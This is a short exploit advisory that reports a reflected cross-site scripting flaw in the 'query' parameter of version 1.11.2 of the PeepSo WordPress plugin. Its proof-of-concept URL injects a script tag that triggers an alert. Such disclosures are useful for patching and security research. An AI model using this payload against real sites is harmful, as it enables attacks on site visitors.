WordPress PeepSo 1.11.2 Cross Site Scripting

WordPress PeepSo plugin version 1.11.2 suffers from a cross site scripting vulnerability.


MD5 | 0d2abe1f8360ec073ae662fa0f60ddd8



===================================================================================
PeepSo v1.11.2 (WordPress Plugin) - Cross-Site Scripting Vulnerability in Members"
===================================================================================


____________________________________________________________________________________


# Exploit Title: PeepSo v1.11.2 (WordPress Plugin) - XSS Vulnerability in Members

# Date: [11-09-2018]

# Category: Webapps

____________________________________________________________________________________


# Author: Socket_0x03 (Alvaro J. Gene)

# Email: Socket_0x03 (at) teraexe (dot) com

# Website: www.teraexe.com

____________________________________________________________________________________


# Software Link: https://wordpress.org/plugins/peepso-core/

# Plugin: PeepSo

# Version: 1.11.2

# File: Members

# Parameter: query

# Language: This application is available in English language.

# Plugin Description: PeepSo is a social network plugin for WordPress with different
kinds of features, such as user profiles, user registration, and other features.

____________________________________________________________________________________


# Cross-Site Scripting Vulnerability:

http://www.website.com/wordpress/index.php/members/?blocked/&query="><script>alert(23)</script>



Related Posts